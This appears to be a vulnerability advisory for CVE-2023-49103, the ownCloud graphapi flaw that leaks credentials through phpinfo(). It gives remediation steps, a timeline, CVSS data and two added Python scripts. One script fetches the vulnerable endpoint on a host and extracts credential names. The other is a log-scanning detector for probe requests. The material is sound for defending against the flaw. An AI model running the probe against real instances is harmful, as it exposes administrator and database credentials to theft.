What is ownCloud graphapi?
ownCloud is a popular open-source file sharing and collaboration platform, a self-hosted alternative to Dropbox or Google Drive, widely deployed by organizations handling sensitive documents, including government agencies, legal firms, healthcare organizations, and enterprises. The ownCloud graphapi app exposes a Microsoft Graph-compatible API for ownCloud and depends on the third-party `microsoft/microsoft-graph` PHP library; that library's Composer package ships a diagnostic test script, `GetPhpInfo.php`, whose only job is to call `phpinfo()`. In containerized (Docker) deployments, sensitive configuration values such as the admin password and database credentials are typically passed to the application as environment variables, and `phpinfo()` prints every environment variable of the PHP process to anyone who can reach the script.
Overview
CVE-2023-49103 is a critical information disclosure vulnerability in the ownCloud graphapi app: the `GetPhpInfo.php` script is reachable without authentication and returns the output of PHP's `phpinfo()` function, which in Docker-based ownCloud deployments reveals `OWNCLOUD_ADMIN_PASSWORD`, the `OWNCLOUD_DB_*` credentials, mail server passwords, the license key, and every other secret passed through environment variables. Exploitation requires a single unauthenticated HTTP GET request. Mass exploitation was observed within days of the advisory.
Affected Versions
| Product | Affected | Remediation |
|---|---|---|
| ownCloud graphapi 0.2.x | 0.2.0 | Upgrade to 0.2.1 (ships without the file) or delete GetPhpInfo.php |
| ownCloud graphapi 0.3.x | 0.3.0 | Upgrade to 0.3.1 (ships without the file) or delete GetPhpInfo.php |
| ownCloud (containerized) | Any deployment with graphapi installed, whether the app is enabled or disabled | Delete GetPhpInfo.php, disable phpinfo(), rotate all credentials |
Note: The vulnerability is present even if the graphapi app is disabled in ownCloud. Disabling an app does not remove its files from the web root, so the PHP script remains reachable until it is deleted or the app is upgraded to a version that no longer ships it.
Technical Details
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor). The ownCloud graphapi app depends on the Microsoft Graph PHP library (`microsoft/microsoft-graph`), whose package ships a test file at `vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php`. The file does nothing but call PHP's built-in `phpinfo()`, which outputs a complete dump of the PHP environment, including:
- All environment variables of the PHP process, including `OWNCLOUD_ADMIN_USERNAME` and `OWNCLOUD_ADMIN_PASSWORD`
- Database connection settings (`OWNCLOUD_DB_HOST`, `OWNCLOUD_DB_NAME`, `OWNCLOUD_DB_USER`, `OWNCLOUD_DB_PASSWORD`)
- Mail server credentials (`OWNCLOUD_SMTP_PASSWORD`)
- Object storage credentials (S3 secret keys and similar), when they are passed through the environment
- PHP configuration, loaded modules, and server information
The file is served at `/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php` (or `/apps/graphapi/...` when ownCloud is served from the document root) without any authentication. A single GET request returns enough for an attacker to log in to ownCloud as administrator and read every stored file, and the database and mail credentials give further footholds outside the application itself.
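The following is an added example, not code from the ownCloud project or its advisory. It shows what the leaked page actually contains and how a responder (or an attacker) pulls the secrets out of it: `phpinfo()` renders its "Environment" table as one `<tr>` per variable with the name in a `<td class="e">` cell and the value in a `<td class="v">` cell. The HTML fragment, host names and values below are constructed for the demonstration; the `check_instance` helper, which fetches the endpoint over the network, is an assumption about the deployment layout (root or `/owncloud/` sub-directory) and is only for hosts you are authorised to test.

```python
"""Extract environment-variable secrets from a captured phpinfo() page.

Added example; not code from the ownCloud project or its advisory.
"""
import html
import re
import urllib.request
from typing import Dict, List

# Constructed sample response body shaped like phpinfo()'s "Environment"
# table. Not a real capture; values are placeholders.
SAMPLE_PHPINFO = """\
<h2>Environment</h2>
<table>
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">HOSTNAME </td><td class="v">owncloud-app-1 </td></tr>
<tr><td class="e">OWNCLOUD_ADMIN_USERNAME </td><td class="v">admin </td></tr>
<tr><td class="e">OWNCLOUD_ADMIN_PASSWORD </td><td class="v">S3cr3t&amp;Pass </td></tr>
<tr><td class="e">OWNCLOUD_DB_HOST </td><td class="v">db </td></tr>
<tr><td class="e">OWNCLOUD_DB_PASSWORD </td><td class="v">dbpass123 </td></tr>
<tr><td class="e">OWNCLOUD_SMTP_PASSWORD </td><td class="v">mailpass </td></tr>
<tr><td class="e">PATH </td><td class="v">/usr/local/bin:/usr/bin </td></tr>
</table>
"""

# phpinfo() renders each variable as <td class="e">NAME </td><td class="v">VALUE </td>
ROW_RE = re.compile(r'<td class="e">(.*?)</td>\s*<td class="v">(.*?)</td>', re.S)

# Name fragments that mark a variable as a credential or key rather than plain config.
SECRET_HINTS = ("PASSWORD", "SECRET", "TOKEN", "LICENSE", "_KEY")

# Location of the script relative to the ownCloud web root (from the advisory).
GETPHPINFO_PATH = "apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"


def parse_phpinfo_env(body: str) -> Dict[str, str]:
    """Return {NAME: VALUE} for every name/value row in a phpinfo() HTML dump."""
    env: Dict[str, str] = {}
    for name, value in ROW_RE.findall(body):
        env[html.unescape(name).strip()] = html.unescape(value).strip()
    return env


def find_exposed_secrets(env: Dict[str, str]) -> List[str]:
    """Names of variables that look like credentials, sorted for stable output."""
    return sorted(n for n in env if any(h in n.upper() for h in SECRET_HINTS))


def probe_urls(base_url: str) -> List[str]:
    """Candidate URLs for the document-root and /owncloud/ sub-directory layouts (assumed)."""
    base = base_url.rstrip("/")
    return [f"{base}/{GETPHPINFO_PATH}", f"{base}/owncloud/{GETPHPINFO_PATH}"]


def check_instance(base_url: str, timeout: float = 10.0) -> List[str]:
    """Fetch the endpoint on a host you are authorised to test; return exposed names.

    Network call; not exercised by the offline demonstration below.
    """
    for url in probe_urls(base_url):
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", errors="replace")
        except Exception:
            continue
        # phpinfo() pages carry these markers; anything else is not the leak.
        if "phpinfo()" in body or "PHP Version" in body:
            return find_exposed_secrets(parse_phpinfo_env(body))
    return []


if __name__ == "__main__":
    env = parse_phpinfo_env(SAMPLE_PHPINFO)
    for name in find_exposed_secrets(env):
        # Never log the full value; three characters are enough to confirm the match.
        print(f"EXPOSED {name} = {env[name][:3]}***")
```

The name-based filter is deliberately broad: anything with PASSWORD, SECRET, TOKEN, LICENSE or _KEY in its name is treated as a credential to rotate, since a missed secret costs far more than a false positive here.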
Discovery
The vulnerable file was identified by ownCloud's security team and disclosed in the vendor advisory of 2023-11-21. Internet scan data (GreyNoise, Shodan) then showed mass exploitation within days: attackers swept every discoverable ownCloud instance for the endpoint. The CVSS 10.0 score reflects trivial exploitation (one unauthenticated GET request) combined with complete credential exposure; the Scope: Changed rating captures the fact that the leaked database, mail and storage credentials reach systems beyond the web application itself.
Exploitation Context
The vulnerability's ease of exploitation, one unauthenticated HTTP request, made it attractive for both automated scanning campaigns and targeted attacks. Organizations running Docker-based ownCloud deployments in data-sensitive sectors (legal, healthcare, government, financial services) were at particular risk: the leaked admin credentials give immediate access to every file and user record in ownCloud. After stealing the credentials an attacker can walk the full file repository, which may include document management content with sensitive client data, financial records, or regulated information, and can reuse the database and mail credentials wherever those services are reachable.
Remediation
- Delete the vulnerable file immediately: `rm /path/to/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php`. This is the primary mitigation and is required even if graphapi is disabled, because disabling the app does not remove the file from the web root. In containerized deployments make the deletion persistent (rebuild the image or apply it in the entrypoint); a file removed only inside a running container returns when the container is recreated.
- Update the graphapi app to 0.2.1 or 0.3.1, the patched releases that no longer ship `GetPhpInfo.php`.
- Rotate all credentials that may have been exposed: the ownCloud admin password, database passwords, mail server passwords, object storage keys, the license key, and any other secret passed as an environment variable.
- Disable the `phpinfo()` function in PHP configuration (`disable_functions = phpinfo`) to close the same exposure from any other bundled diagnostic script.
- Review web server access logs for requests whose path contains `/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php`. Public scanners are known to append a suffix such as `/.css` to the file name to get past web-server rules that block direct requests for `.php` files under vendor directories, so match on the path prefix rather than the exact file name. Any such request that received a 200 response is a credential exposure event; if your logs do not reach back to 2023-11-21, assume exposure and rotate anyway.
- Check ownCloud's own logs for suspicious admin login activity from 2023-11-21 onward, in particular admin sessions from unfamiliar source addresses.
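The log-review step above, as an added example rather than tooling from the ownCloud project: it parses combined-format access log lines, matches the `GetPhpInfo.php` path with or without a trailing segment or query string, and labels each probe by outcome, since a 2xx response means `phpinfo()` output was actually served while a 403 or 404 means the web server blocked it. The log lines, addresses and timestamps are constructed for the demonstration (documentation IP ranges, not a real capture); the 403-then-200 pair models the scanner behaviour of retrying with a `/.css` suffix.

```python
"""Review combined-format access logs for CVE-2023-49103 probes.

Added example; not the ownCloud project's tooling.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional

# Constructed sample log (Apache/nginx "combined" format). Not a real capture.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Nov/2023:10:14:03 +0000] "GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 403 199 "-" "python-requests/2.31.0"
203.0.113.5 - - [25/Nov/2023:10:14:05 +0000] "GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css HTTP/1.1" 200 84213 "-" "python-requests/2.31.0"
198.51.100.7 - - [25/Nov/2023:11:02:44 +0000] "GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php?x=1 HTTP/1.1" 404 231 "-" "curl/8.4.0"
192.0.2.9 - - [25/Nov/2023:11:30:01 +0000] "GET /index.php/apps/files/ HTTP/1.1" 200 1402 "-" "Mozilla/5.0"
192.0.2.9 - alice [25/Nov/2023:11:31:12 +0000] "POST /index.php/login HTTP/1.1" 303 0 "-" "Mozilla/5.0"
"""

# ip ident user [time] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Match the script under either layout (document root or /owncloud/) and
# tolerate a trailing path segment such as "/.css" or a query string.
PROBE_RE = re.compile(
    r'/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo\.php(?:[/?]|$)'
)


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_getphpinfo_probe(path: str) -> bool:
    """True when the request path targets the leaking script, suffix or not."""
    return PROBE_RE.search(path) is not None


def review_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return every request for GetPhpInfo.php, each labelled exposed or blocked."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None or not is_getphpinfo_probe(rec["path"]):
            continue
        # Any 2xx means the phpinfo() page was served: treat as credential exposure.
        rec["outcome"] = "exposed" if rec["status"].startswith("2") else "blocked"
        hits.append(rec)
    return hits


def summarize(hits: Iterable[Dict[str, str]]) -> Dict[str, Dict[str, int]]:
    """Per-source-IP counts of exposed versus blocked probes."""
    summary: Dict[str, Dict[str, int]] = defaultdict(lambda: {"exposed": 0, "blocked": 0})
    for h in hits:
        summary[h["ip"]][h["outcome"]] += 1
    return dict(summary)


if __name__ == "__main__":
    hits = review_log(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f'{h["time"]} {h["ip"]} {h["status"]} {h["outcome"]:8} {h["path"]}')
    print(summarize(hits))
```

One "exposed" hit is sufficient to trigger the full credential rotation; the per-IP summary is only there to scope the incident (which sources saw the page, and when) for the follow-up review of admin logins.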
Key Details
| Property | Value |
|---|---|
| CVE ID | CVE-2023-49103 |
| Vendor / Product | ownCloud — ownCloud graphapi |
| NVD Published | 2023-11-21 |
| NVD Last Modified | 2025-10-31 |
| CVSS 3.1 Score | 10 |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| Severity | CRITICAL |
| CWE | CWE-200 |
| CISA KEV Added | 2023-11-30 |
| CISA KEV Deadline | 2023-12-21 |
| Known Ransomware Use | No |
CVSS 3.1 Breakdown
| Metric | Value |
|---|---|
| Attack Vector (AV) | Network (N) |
| Attack Complexity (AC) | Low (L) |
| Privileges Required (PR) | None (N) |
| User Interaction (UI) | None (N) |
| Scope (S) | Changed (C) |
| Confidentiality (C) | High (H) |
| Integrity (I) | High (H) |
| Availability (A) | High (H) |
Required Action
Apply mitigations per vendor instructions (delete GetPhpInfo.php, disable phpinfo(), rotate credentials) or discontinue use of the product if mitigations are unavailable, by the CISA BOD 22-01 deadline of 2023-12-21.
Timeline
| Date | Event |
|---|---|
| 2023-11-21 | ownCloud publishes security advisory disclosing CVE-2023-49103; recommends deleting GetPhpInfo.php file |
| 2023-11-25 | Mass exploitation observed: GreyNoise reports active probing of the vulnerable endpoint across the internet, with Shodan-indexed instances being swept |
| 2023-11-30 | CISA adds to Known Exploited Vulnerabilities catalog |
| 2023-12-21 | CISA BOD 22-01 remediation deadline |
References
| Resource | Type |
|---|---|
| ownCloud Security Advisory — Disclosure of Sensitive Credentials | Vendor Advisory |
| NVD — CVE-2023-49103 | Vulnerability Database |
| CISA KEV Catalog Entry | US Government |